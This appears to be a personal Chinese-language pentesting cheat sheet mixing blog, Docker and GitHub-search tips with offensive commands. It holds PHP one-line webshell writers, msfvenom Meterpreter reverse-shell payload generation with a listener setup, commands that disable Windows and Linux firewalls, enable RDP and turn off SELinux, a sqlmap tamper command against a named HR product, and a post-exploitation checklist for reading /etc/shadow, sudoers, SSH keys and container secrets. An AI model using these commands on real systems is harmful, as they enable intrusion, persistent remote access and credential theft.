推送到github
hexo g    # generate生成
hexo d # deploy 推送
windows
#关闭防火墙和开启3389
netsh firewall set opmode mode=disable

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

#windows查找
win tasklist /svc /if查找到文件名然后搜索位置,

#查找指定目录下指定文件名
dir C:\ /s /b | find "example.txt"
#bash写入一句话木马
echo ^<? php @eval($_POST['123']); ?^> > shell.php

echo ^<? php @eval($_POST['123']);?^> >> shell.php
#windows更新延长
注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsUpdate\UX\Settings
新建一个DWORD(32位)值命名为FlightSettingsMaxPauseDays
双击新建的FlightSettingsMaxPauseDays基数改为10进制,左侧数值数据写上你想暂停更新的天数,点击确定
在windows更新中选择暂停时间,可选择刚才设置的时间
msf
https://blog.csdn.net/qq_15131581/article/details/127452844

#生成payload
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=2333 -f py
生成elf木马
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=X.X.X.X LPORT=8888 -f elf > mshell.elf

#监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 8888
run
#上传
upload //root//fscan_386





proxychains安装

apt-get install proxychains
vim /etc/proxychains.conf
添加socks5 127.0.0.1 1080

sqlmap 用友ehr绕过

sqlmap -u "http://x.x.x.x/servlet/codesettree?categories=1&codesetid=1&flag=c&parentid=-1&status=1"  -p categories --dbms="Microsoft SQL Server" --tamper ehr_SafeCodeEncode_tamper --level 3

docker

#进入容器内部
docker exec -it <id> /bin/bash
#查看docker状态
docker container ls


#检测是否在docker中
# 是否存在此文件
ls -al /.dockerenv

# 在其中是否包含docker字符串
cat /proc/1/cgroup
gtihub搜索语法:
in:name baidu       #标题搜索含有关键字baidu
in:descripton baidu #仓库描述搜索含有关键字
in:readme baidu #Readme文件搜素含有关键字
stars:>3000 baidu #stars数量大于3000的搜索关键字
stars:1000..3000 baidu #stars数量大于1000小于3000的搜索关键字
forks:>1000 baidu #forks数量大于1000的搜索关键字
forks:1000..3000 baidu #forks数量大于1000小于3000的搜索关键字
size:>=5000 baidu #指定仓库大于5000k(5M)的搜索关键字
pushed:>2019-02-12 baidu #发布时间大于2019-02-12的搜索关键字
created:>2019-02-12 baidu #创建时间大于2019-02-12的搜索关键字
user:name #用户名搜素
license:apache-2.0 baidu #明确仓库的 LICENSE 搜索关键字
language:java baidu #在java语言的代码中搜索关键字
user:baidu in:name baidu #组合搜索,用户名baidu的标题含有baidu的
webrtc
#火狐浏览器
about:config,将media.peerconnection.enabled值改为false;
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>WebRTC泄露检测</title>
</head>
<body>
<script>
function findIP(onNewIP) {
var myPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection;
var pc = new myPeerConnection({iceServers: [{urls: "stun:stun.l.google.com:19302"}]}),
noop = function() {},
localIPs = {},
ipRegex = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/g,
key;

function ipIterate(ip) {
if (!localIPs[ip]) onNewIP(ip);
localIPs[ip] = true;
}

pc.createDataChannel("");

pc.createOffer(function(sdp) {
sdp.sdp.split('\n').forEach(function(line) {
if (line.indexOf('candidate') < 0) return;
line.match(ipRegex).forEach(ipIterate);
});
pc.setLocalDescription(sdp, noop, noop);
}, noop);

pc.onicecandidate = function(ice) {
if (!ice || !ice.candidate || !ice.candidate.candidate || !ice.candidate.candidate.match(ipRegex)) return;
ice.candidate.candidate.match(ipRegex).forEach(ipIterate);
};
}

function show(ip) {
alert(ip);
}

findIP(show);

</script>
</body>
</html>
linux
less

less和more类似,但是使用less可以随意浏览文件,而more仅能向前移动,却不能向后移动,more启动时会加载整个文件。而且less在查看之前不会加载整个文件

awk

用来处理文本,将文本按照指定的格式输出。其中包含了变量,循环以及数组

[root@localhost ~]#awk -F: '{print $1}' /etc/passwd
root
bin
daemon
adm
...
docker

进去容器中

docker exec -it /bin/bash

关闭所有容器

docker stop $(docker ps -a -q)
nmap

-sn 基础主机发现

-sc 默认脚本

–script=vuln 脚本扫描 脚本路径在/usr/share/nmap/scripts

– ssl-enum-ciphers ssl版本漏洞

-pn /-p0 无ping扫描

命令
#写入一句话木马
echo '<?php @eval($_POST["123"]); ?>' > 1.php

echo '<?php @eval($_POST["123"]); ?>' >> 1.php
#查找指定目录的指定文件名
find /root -name "1.txt"

#查找8080端口所对应的服务
lsof -i :8080

#linux查找文件进程
linux查找文件进程后可以用tree进程树查找最后定位到文件。win 定位后管理器查看进程文件位置。
Linux lsof直接就可以看
#乱码
chcp 65001
#切换账户到admin
su -l admin

#创建账户
useradd name
passwd name

# 设置静态网卡
vim /etc/sysconfig/network-scripts/ifcfg-eno
systemctl restart network
#关闭防火墙和临时禁用selinux安全模块
systemctl stop firewalld
setenforce 0
#清空防火墙规则
iptables -F
获取内核,操作系统和设备信息
版本信息
uname -a 所有版本
uname -r 内核版本信息
uname -n 系统主机名字
uname -m Linux内核架构
内核信息 cat /proc/version
CPU信息 cat /proc/cpuinfo
发布信息
cat /etc/*-release
cat /etc/issue
主机名 hostname
文件系统 df -a
内核日志 dmesg / /var/log/dmesg
6.2.1.2. 用户和组
列出系统所有用户 cat /etc/passwd
列出系统所有组 cat /etc/group
列出所有用户hash(root)``cat /etc/shadow``
用户
查询用户的基本信息 finger
当前登录的用户 users who -a /var/log/utmp
查询无密码用户 grep 'x:0:' /etc/passwd
目前登录的用户 w
登入过的用户信息 last / /var/log/wtmp
显示系统中所有用户最近一次登录信息 lastlog / /var/log/lastlog
登录成功日志 /var/log/secure
登录失败日志 /var/log/faillog
查看特权用户 grep :0 /etc/passwd
查看passwd最后修改时间 ls -l /etc/passwd
查看是否存在空口令用户 awk -F: 'length($2)==0 {print $1}' /etc/shadow
查看远程登录的账号 awk '/\$1|\$6/{print $1}' /etc/shadow
查看具有sudo权限的用户
cat /etc/sudoers | grep -v "^#\|^$" | grep "ALL=(ALL)"
6.2.1.3. 用户和权限信息
当前用户 whoami
当前用户信息 id
可以使用sudo提升到root的用户(root) cat /etc/sudoers
列出目前用户可执行与无法执行的指令 sudo -l
6.2.1.4. 环境信息
打印系统环境信息 env
打印系统环境信息 set
环境变量中的路径信息 echo $PATH
打印历史命令 history / ~/.bash_history
显示当前路径 pwd
显示默认系统遍历 cat /etc/profile
显示可用的shell cat /etc/shells
6.2.1.5. 进程信息
查看进程信息 ps aux
资源占有情况 top -c
查看进程关联文件 lsof -c $PID
完整命令行信息 /proc/$PID/cmdline
进程的命令名 /proc/$PID/comm
进程当前工作目录的符号链接 /proc/$PID/cwd
运行程序的符号链接 /proc/$PID/exe
进程的环境变量 /proc/$PID/environ
进程打开文件的情况 /proc/$PID/fd
6.2.1.6. 服务信息
由inetd管理的服务列表 cat /etc/inetd.conf
由xinetd管理的服务列表 cat /etc/xinetd.conf
nfs服务器的配置 cat /etc/exports
邮件信息 /var/log/mailog
ssh配置 sshd_config
6.2.1.7. 计划任务
显示指定用户的计划作业(root) crontab -l -u %user%
计划任务
/var/spool/cron/*
/var/spool/anacron/*
/etc/crontab
/etc/anacrontab
/etc/cron.*
/etc/anacrontab
开机启动项
/etc/rc.d/init.d/
6.2.1.8. 网络、路由和通信
列出网络接口信息 /sbin/ifconfig -a / ip addr show
列出网络接口信息 cat /etc/network/interfaces
查看系统arp表 arp -a
打印路由信息 route / ip ro show
查看dns配置信息 cat /etc/resolv.conf
打印本地端口开放信息 netstat -an
列出iptable的配置规则 iptables -L
查看端口服务映射 cat /etc/services
Hostname hostname -f
查看进程端口情况 netstat -anltp | grep $PID
6.2.1.9. 已安装程序
rpm -qa --last Redhat
yum list | grep installed CentOS
ls -l /etc/yum.repos.d/
dpkg -l Debian
cat /etc/apt/sources.list Debian APT
pkg_info xBSD
pkginfo Solaris
pacman -Q Arch Linux
emerge Gentoo
6.2.1.10. 文件
最近五天的文件 find / -ctime +1 -ctime -5
文件系统细节 debugfs
6.2.1.11. 公私钥信息
~/.ssh
/etc/ssh
6.2.1.12. 日志
/var/log/boot.log
/var/log/cron
/var/log/faillog
/var/log/lastlog
/var/log/messages
/var/log/secure
/var/log/syslog
/var/log/syslog
/var/log/wtmp
/var/log/wtmp
/var/run/utmp
6.2.1.13. 虚拟环境检测
lsmod | grep -i "vboxsf\|vboxguest"
lsmod | grep -i "vmw_baloon\|vmxnet"
lsmod | grep -i "xen-vbd\|xen-vnif"
lsmod | grep -i "virtio_pci\|virtio_net"
lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc"
6.2.1.14. 容器内信息收集
capsh --print
cat /proc/1/cgroup
env | grep KUBE
ls -l .dockerenv
ls -l /run/secrets/Kubernetes.io/
mount
ps aux